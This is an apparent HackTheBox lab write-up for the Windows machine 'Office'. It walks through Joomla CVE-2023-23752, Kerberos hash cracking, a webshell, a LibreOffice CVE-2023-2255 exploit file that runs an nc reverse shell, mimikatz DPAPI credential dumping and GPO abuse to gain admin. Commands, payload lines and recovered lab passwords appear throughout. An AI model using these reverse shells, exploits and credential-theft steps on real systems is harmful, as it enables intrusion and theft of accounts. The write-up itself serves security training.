HTB - Office
Machine Info
Office is a hard-difficulty Windows machine featuring various vulnerabilities including Joomla web application abuse, PCAP analysis to identify Kerberos credentials, abusing LibreOffice vulnerability, abusing MSKRP to dump DPAPI credentials and abusing Group Policies due to excessive Active Directory privileges.
Enumeration
Scope
IP Address: 10.10.11.3
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
80/tcp open http syn-ack
139/tcp open netbios-ssn syn-ack
443/tcp open https syn-ack
445/tcp open microsoft-ds syn-ack
593/tcp open http-rpc-epmap syn-ack
3268/tcp open globalcatLDAP syn-ack
3269/tcp open globalcatLDAPssl syn-ack
5985/tcp open wsman syn-ack
9389/tcp open adws syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU -p1-10000 --min-rate 10000 $ip -Pn
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,139,443,445,593,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain?
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Home
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/
| /cache/ /cli/ /components/ /includes/ /installation/
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-generator: Joomla! - Open Source Content Management
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:42+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:43+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after: 2024-05-09T12:36:58
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
Service Info: Hosts: www.example.com, DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-14T17:06:04
|_ start_date: N/A
|_clock-skew: mean: 8h00m09s, deviation: 0s, median: 8h00m09s* Open ports: 53,80,139,443,445,593,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - SMB - KERBEROS - LDAP - winRM
* Versions: Apache httpd 2.4.56 - OpenSSL/1.1.1t - PHP/8.0.28
* Important notes:
http-robots.txt: 16 disallowed entries (15 shown)
http-generator:Joomla! - Open Source Content Management
Domain: office. - DNS:DC.office.htbHTTPS Enumeration
when visiting https://10.10.11.3/, it gives me Forbidden massages
SMB Enumeration
No thing from smb
KERBEROS Enumeration
Found some users from kerbrute with jsmith.txt wordlist
Additional users found when using xato-10-million wordlist
I added all users found in a wordlist and then tried ASREPROASTING attack but it failed
HTTP Enumeration
http://10.10.11.3/
The site is joomla CMS
I visited http://10.10.11.3/readme.txt to get the version and search for CVE for it
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://10.10.11.3/readme.txt | grep -i version
* Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
<snip>I found this version is affected by unauthenticated information disclosure vulnerability
I started Metasploit, searched for exploit with CVE number and found one
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ msfconsole -q
msf6 > search CVE-2023-23752
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/joomla_api_improper_access_checks 2023-02-01 normal Yes Joomla API Improper Access Checks
msf6 > use 0
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > options
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me
tasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the Joomla Application
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts 10.10.11.3
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > run
[+] Users JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.users_565355.bin
[+] Joomla Users
============
ID Super User Name Username Email Send Email Register Date Last Visit Date Group Names
-- ---------- ---- -------- ----- ---------- ------------- --------------- -----------
474 * Tony Stark Administrator Administrator@holograp 1 2023-04-13 23:27: 2024-01-24 13:00: Super Users
hy.htb 32 47
[+] Config JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.config_217752.bin
[+] Joomla Config
=============
Setting Value
------- -----
db encryption 0
db host localhost
db name joomla_db
db password H0lOgrams4reTakIng0Ver754!
db prefix if2tx_
db user root
dbtype mysqli
[*] Scanned 1 of 1 hosts (100% complete)We get database credentials:
db host localhost
db name joomla_db
db password H0lOgrams4reTakIng0Ver754!
db user rootSince I get username of joomla but still don't know the password, I will reuse the password of the database I found against the web login form and the users we found before
Let's begin to enumerate the domain with these credentials and I will do the following
Run
Bloodhound IngestorsEnumerate the Shares
Searching for kerberoastable accounts
Run
bloodhound.pyto collect info and feed it into bloodhound GUI
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ bloodhound-python -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -ns $ip -d office.htb -c all
<snip>
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.office.htb
INFO: Done in 00M 21SStart crackmapexec to view the shares and permissions on them
I run spider_plus module against the shares to explore their content fast
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u dwolfe -p 'H0lOgrams4reTakIng0Ver754!' -M spider_plus
SMB 10.10.11.3 445 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.3 445 DC [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!
SPIDER_P... 10.10.11.3 445 DC [*] Started spidering plus with option:
SPIDER_P... 10.10.11.3 445 DC [*] DIR: ['print$']
SPIDER_P... 10.10.11.3 445 DC [*] EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.3 445 DC [*] SIZE: 51200
SPIDER_P... 10.10.11.3 445 DC [*] OUTPUT: /tmp/cme_spider_plusI found .pcap file located at SOC Analysis share, So I will download and examine it locally
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ cat /tmp/cme_spider_plus/10.10.11.3.json
<snip>
"SOC Analysis": {
"Latest-System-Dump-8fbc124d.pcap": {
"atime_epoch": "2023-05-07 20:59:54",
"ctime_epoch": "2023-05-07 20:59:54",
"mtime_epoch": "2023-05-10 14:51:42",
"size": "1.31 MB"
}
<snip>
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ smbclient -U dwolfe \\\\$ip\\'SOC Analysis'
Password for [WORKGROUP\dwolfe]:
smb: \> ls
. D 0 Wed May 10 14:52:24 2023
.. DHS 0 Wed Feb 14 05:18:31 2024
Latest-System-Dump-8fbc124d.pcap A 1372860 Sun May 7 20:59:00 2023
smb: \> get Latest-System-Dump-8fbc124d.pcap Shell as web_account
Start Wireshark to examine the file
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ wireshark Latest-System-Dump-8fbc124d.pcap After examining wireshark, Only two packets took my attention:
The second packet has the cipher which is encrypted by the NTLM hash of the user requested kerberos and username: tstark, too.
Following up this post
I can construct the kerberos hash to be able to crack it with hashcat
$<kerberos 5 pre-auth>$<encyption type>$<username>$<domain-name>$cipher
$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ hashcat -m 19900 kerberos.hash /usr/share/wordlists/rockyou.txt
<snip>
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69
Session..........: hashcat
Status...........: CrackedI tried this password on joomla admin panel as administrator cause the CVE we found showed that the administrator account has Tony Stark name.
From HackTricks
After doing the steps above, I added a webshell and got RCE on the system
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://$ip/administrator/templates/atum/error.php?cmd=whoami
office\web_accountI will upgrade the webshell to p0wny.php to become more flexible
I didn't find useful things in the context of web_account as his home directory is empty, So I uploaded RunasCs.exe to get a shell with stark
Shell as tstark
.\RunasCs.exe tstark playboy69 PowerShell -r 10.10.16.7:4444
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-9b0db$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5748 created in background.┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 61764
PS C:\Windows\system32> whoami
office\tstark
PS C:\Users\tstark> type Desktop\user.txt
fc7d5bd1f9cf6a3c6xxxxxxxxxxxxxxxUser Flag: fc7d5bd1f9cf6a3c6cxxxxxxxxxxxxxxx
Shell as ppotts
looking for listening ports, there is non-standard port listening
Looking for the process that run this port revealed that its web server running
PS C:\xampp\htdocs\internal> tasklist /svc | findstr 4024
httpd.exe 4024 Apache2.4I uploaded Chisel to the machine and map this port to my kali machine.
On kali run
./chisel_1.9.1_linux_amd64 server -p 8443 --reverseOn windows box run
.\c.exe client 10.10.16.7:8443 R:8083:localhost:8083http://localhost:8083/resume.php
The web app doesn't any file extension except these four Doc, Docx, Docm, Odt.
after I uploaded a file.odt to the webapp, it appeared in applications folder under xampp\htdocs with different name
Note: No file with
.odtwas there before I upload my file!!!
PS C:\xampp\htdocs\internal> dir applications
Directory: C:\xampp\htdocs\internal\applications
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/14/2024 4:13 PM 20321 john-it-30-000-0-5-years-john@htb-com.doc
-a---- 7/14/2024 5:01 PM 0 john-it-30-000-0-5-years-john@htb-com.odt checking its permissions, the user ppotts has full access on it.
PS C:\xampp\htdocs\internal> icacls applications
icacls applications
applications CREATOR OWNER:(OI)(CI)(IO)(F)
OFFICE\PPotts:(OI)(CI)(NP)(F)
NT AUTHORITY\SYSTEM:(OI)(CI)(F)
NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)
OFFICE\web_account:(OI)(CI)(RX,W)
BUILTIN\Administrators:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX)The community said that there is a CVE affected
Libreofficeto create.odtfile and get RCE from it
┌──(kali㉿kali)-[~/…/HTB/machines/Office/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\nc.exe 10.10.16.7 8888 -e PowerShell' --output 'exploit.odt'
File exploit.odt has been created !Upload the exploit via webapp
Get a shell as ppotts
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 62159
Windows PowerShell
PS C:\Program Files\LibreOffice 5\program> whoami
office\ppottsThere is a job_offering.ps1 on music directory that is responsible to trigger the exploit
PS C:\Users\PPotts> type Music\job_offering.ps1
# Specify the path to the directory containing ODT files
$directoryPath = "C:\xampp\htdocs\internal\applications"
# Get all ODT files in the directory
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt
foreach ($odtFile in $odtFiles) {
$newFileName = $odtFile.BaseName + "_resume" + $odtFile.Extension
$destination = Join-Path -Path "c:\xampp\htdocs\internal\applications\" -ChildPath $newFileName
Copy-Item -Path $odtFile.FullName -Destination $destination -Force
del C:\xampp\htdocs\internal\applications\$odtFile
}
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt
# Array to store LibreOffice process IDs
$libreOfficeProcessIds = @()
foreach ($odtFile in $odtFiles) {
# Start LibreOffice to open the ODT file
Start-Process "C:\Program Files\LibreOffice 5\program\soffice.exe" -ArgumentList "--headless", "--invisible", "--nologo", "--norestore", "--accept=uno:socket,host=localhost,port=8100;urp;StarOffice.ServiceManager", $odtFile.FullName -PassThru | ForEach-Object {
# Store the process ID for later termination
$libreOfficeProcessIds = $_.Id
}
# Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
Start-Sleep -Seconds 7
# Wait for LibreOffice processes to finish opening files and then terminate them
Stop-Process -Id $libreOfficeProcessIds -Force
# Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
Start-Sleep -Seconds 5
}
Get-ChildItem -Path "c:\xampp\htdocs\internal\applications\" -Force | Remove-Item -Force
# Put the MacroSecurityLevel key back to its original value
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 3 /fShell as hhogan
There are stored credentials for hhogan in user ppotts session
PS C:\Users\PPotts> cmdkey /list
Currently stored credentials:
Target: LegacyGeneric:target=MyTarget
Type: Generic
User: MyUser
Target: Domain:interactive=office\hhogan
Type: Domain Password
User: office\hhoganWhen I tried to execute commands as that user, It asked for a password
PS C:\Users\PPotts> runas /savecred /user:office\hhogan whoami
Enter the password for office\hhogan: Looking at bloodhound, User hhogan is a member of GPO MANAGERS which has the ability to add group policy object that can be abused to do malicious actions.
As we don't know the password of hhogan, We can extract it by decrypting DPAPI. We need the masterkey and credentials files which are located by default in <user>\AppData\Roaming\Microsoft\Credentials & <user>\AppData\Roaming\Microsoft\Protect\<user-sid>\GUID
Credentials files
PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Credentials
Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 5/9/2023 2:08 PM 358 18A1927A997A794B65E9849883AC3F3E
-a-hs- 5/9/2023 4:03 PM 398 84F1CAEEBF466550F4967858F9353FB4
-a-hs- 7/14/2024 5:18 PM 374 E76CCA3670CD9BB98DF79E0A8D176F1EMaster keys
PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\
Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a-hs- 1/17/2024 3:43 PM 740 10811601-0fa9-43c2-97e5-9bef8471fc7d
-a-hs- 5/2/2023 4:13 PM 740 191d3f9d-7959-4b4d-a520-a444853c47eb
-a-hs- 7/14/2024 10:00 AM 740 5f692621-38e9-43bb-ad87-e3ff40ab2720 I uploaded mimkatz.exe and began to extract them.
We must provide a password for the command below but the is a post from SpectorOps that says " it can be done without a password, just provide /rpc options to mimikatz"
https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc" exit
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc
**MASTERKEYS**
dwVersion : 00000002 - 2
szGuid : {191d3f9d-7959-4b4d-a520-a444853c47eb}
dwFlags : 00000000 - 0
dwMasterKeyLen : 00000088 - 136
dwBackupKeyLen : 00000068 - 104
dwCredHistLen : 00000000 - 0
dwDomainKeyLen : 00000174 - 372
[masterkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : c521daa0857ee4fa6e4246266081e94c
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d75e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a066faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f032704330609171c973008d84f
[backupkey]
**MASTERKEY**
dwVersion : 00000002 - 2
salt : a2741b13d7261697be4241ebbe05098a
rounds : 00004650 - 18000
algHash : 00008009 - 32777 (CALG_HMAC)
algCrypt : 00006603 - 26115 (CALG_3DES)
pbKey : 21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67afe987005320d3209
[domainkey]
**DOMAINKEY**
dwVersion : 00000002 - 2
dwSecretLen : 00000100 - 256
dwAccesscheckLen : 00000058 - 88
guidMasterKey : {e523832a-e126-4d6e-ac04-ed10da72b32f}
pbSecret : 159613bdc2d90dd4834a37e29873ce04c74722a706d0ba4770865039b3520ff46cf9c9281542665df2e72db48f67e16e2014e07b88f8b2f7d376a8b9d47041768d650c20661aee31dc340aead98b7600662d2dc320b4f89cf7384c2a47809c024adf0694048c38d6e1e3e10e8bd7baa7a6f1214cd3a029f8372225b2df9754c19e2ae4bc5ff4b85755b4c2dfc89add9f73c54ac45a221e5a72d3efe491aa6da8fb0104a983be20af3280ae68783e8648df413d082fa7d25506e9e6de1aadbf9cf93ec8dfc5fab4bfe1dd1492dbb679b1fa25c3f15fb8500c6021f518c74e42cd4b5d5d6e1057f912db5479ebda56892f346b4e9bf6404906c7cd65a54eea2842
pbAccesscheck : 1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665
[backupkey] without DPAPI_SYSTEM:
key : 4d1b2c18baba7442e79d33cc771bf54027ae2500e08da3ecfccf91303bd471b6
sha1: eeb787c4259e3c8b8408201ee5e54fc29fad22b2
[domainkey] with RPC
[DC] 'office.htb' will be the domain
[DC] 'DC.office.htb' will be the DC server
key : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
sha1: 85285eb368befb1670633b05ce58ca4d75c73c77Try all the three credential files until you get the password
.\mimikatz.exe "dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4 /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166" exit
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # dpapi::cred /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4 /masterkey:87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {191d3f9d-7959-4b4d-a520-a444853c47eb}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 0000003a - 58
szDescription : Enterprise Credential Data
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 649c4466d5d647dd2c595f4e43fb7e1d
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : 32e88dfd1927fdef0ede5abf2c024e3a
dwDataLen : 000000c0 - 192
pbData : f73b168ecbad599e5ca202cf9ff719ace31cc92423a28aff5838d7063de5cccd4ca86bfb2950391284b26a34b0eff2dbc9799bdd726df9fad9cb284bacd7f1ccbba0fe140ac16264896a810e80cac3b68f82c80347c4deaf682c2f4d3be1de025f0a68988fa9d633de943f7b809f35a141149ac748bb415990fb6ea95ef49bd561eb39358d1092aef3bbcc7d5f5f20bab8d3e395350c711d39dbe7c29d49a5328975aa6fd5267b39cf22ed1f9b933e2b8145d66a5a370dcf76de2acdf549fc97
dwSignLen : 00000014 - 20
pbSign : 21bfb22ca38e0a802e38065458cecef00b450976
Decrypting Credential:
* masterkey : 87eedae4c65e0db47fcbc3e7e337c4cce621157863702adc224caf2eedcfbdbaadde99ec95413e18b0965dcac70344ed9848cd04f3b9491c336c4bde4d1d8166
**CREDENTIAL**
credFlags : 00000030 - 48
credSize : 000000be - 190
credUnk0 : 00000000 - 0
Type : 00000002 - 2 - domain_password
Flags : 00000000 - 0
LastWritten : 5/9/2023 11:03:21 PM
unkFlagsOrSize : 00000018 - 24
Persist : 00000003 - 3 - enterprise
AttributeCount : 00000000 - 0
unk0 : 00000000 - 0
unk1 : 00000000 - 0
TargetName : Domain:interactive=OFFICE\HHogan
UnkData : (null)
Comment : (null)
TargetAlias : (null)
UserName : OFFICE\HHogan
CredentialBlob : H4ppyxxxxxx
Attributes : 0Checking the validity of the credentials and the ability to remote access the machine
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u HHogan -p 'H4ppyxxxxxx'
SMB 10.10.11.3 445 DC [+] office.htb\HHogan:H4ppyxxxxxx
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec winrm $ip -u HHogan -p 'H4ppyxxxxxx'
WINRM 10.10.11.3 5985 DC [+] office.htb\HHogan:H4ppyFtW183# (Pwn3d!)Access the machine as hhogan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ evil-winrm -i $ip -u HHogan -p 'H4ppyxxxxxxx'
*Evil-WinRM* PS C:\Users\HHogan\Documents>I don't know any tools to abuse GPO as I didn't perform this attack before so I searched online for one and find
SharpDPOAbuse
*Evil-WinRM* PS C:\Users\HHogan\Documents> upload SharpGPOAbuse.exe
Info: Upload successful!The github repo also shows how to use it
I will use --AddLocalAdmin and here are its options
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added in local admins.
--GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"*Evil-WinRM* PS C:\Users\HHogan\Documents> Get-GPO -All | Select-Object DisplayName
DisplayName
-----------
Windows Firewall GPO
Default Domain Policy
Default Active Directory Settings GPO
Default Domain Controllers Policy
Windows Update GPO
Windows Update Domain Policy
Software Installation GPO
Password Policy GPO
*Evil-WinRM* PS C:\Users\HHogan\Documents> .\SharpGPOAbuse.exe --AddLocalAdmin --UserAccount hhogan --GPOName "Default Domain Policy
"
[+] Domain = office.htb
[+] Domain Controller = DC.office.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=office,DC=htb
[+] SID Value of hhogan = S-1-5-21-1199398058-4196589450-691661856-1108
[+] GUID of "Default Domain Policy" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] File exists: \\office.htb\SysVol\office.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Microsoft\Windows NT\SecEdit\GptTmpl.inf
[+] The GPO does not specify any group memberships.
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new local admin. Wait for the GPO refresh cycle.
[+] Done!Update the group policy to take effect
*Evil-WinRM* PS C:\Users\HHogan\Documents> gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.*Evil-WinRM* PS C:\Users\HHogan\Documents> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/14/2024 9:59 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
abd037fa1e9078e44dxxxxxxxxxxxxxxxxxRoot Flag: abd037fa1e9078e44dxxxxxxxxxxxxxxxxx
Last updated